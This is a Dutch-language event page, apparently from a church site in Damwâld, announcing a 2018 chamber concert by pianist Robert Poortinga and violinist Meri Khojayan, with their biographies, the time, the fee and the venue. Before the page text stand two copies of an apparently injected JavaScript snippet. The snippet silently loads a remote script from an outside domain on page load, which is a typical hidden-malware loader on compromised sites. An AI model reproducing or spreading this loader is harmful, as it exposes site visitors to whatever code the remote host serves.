;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kamerconcert van pianist Robert Poortinga en violiste Meri Khojayan - PKN Damwâld
15 april 2018
16:00 t/m 17:30
Doopsgezinde Kerk Damwâld
Kamerconcert van pianist Robert Poortinga en violiste Meri Khojayan

Op 15 april geven Robert en Meri een bijzonder concert in de Doopsgezinde kerk van Damwâld. Robert Poortinga heeft gestudeerd aan het conservatorium in Groningen bij de Georgische pianodocente Tamara Poddubnaya en is na het behalen van zijn propedeuse op uitnodiging van mevrouw Poddubyana meegegaan naar het Long Island Conservatorium in New York. Nadien heeft hij onder andere nog gestudeerd in Italië en Frankrijk. Hij heeft aan meerdere festivals in binnen- en buitenland meegedaan.

Meri Khojayan heeft in Armenië viool gestudeerd en is met lof afgestudeerd bij Eduard Tadevosyan. Daarna heeft zij vijf jaar aan het Maastrichtse conservatorium gestudeerd. Zij heeft deelgenomen aan diverse competities en festivals in Europa, USA en Azië en heeft met haar muzikale talenten meerdere prijzen gewonnen. Tevens soleerde ze met diverse orkesten.

Robert en Meri werken als echtpaar zeer intensief samen. In 2017 wonnen ze drie prijzen tijdens de “Musical Fireworks” competitie in Baden-Wurttenberg in Duitsland.
Sinds januari 2018 hebben ze een instituut opgestart dat onderzoek doet naar het repertoire dat specifiek geschreven is voor het duo-schap.

Het concert begint om 16.00 uur. De entree is €10,00

Locatie: Doopsgezinde Kerk DamwâldDoniawei 34 Damwâld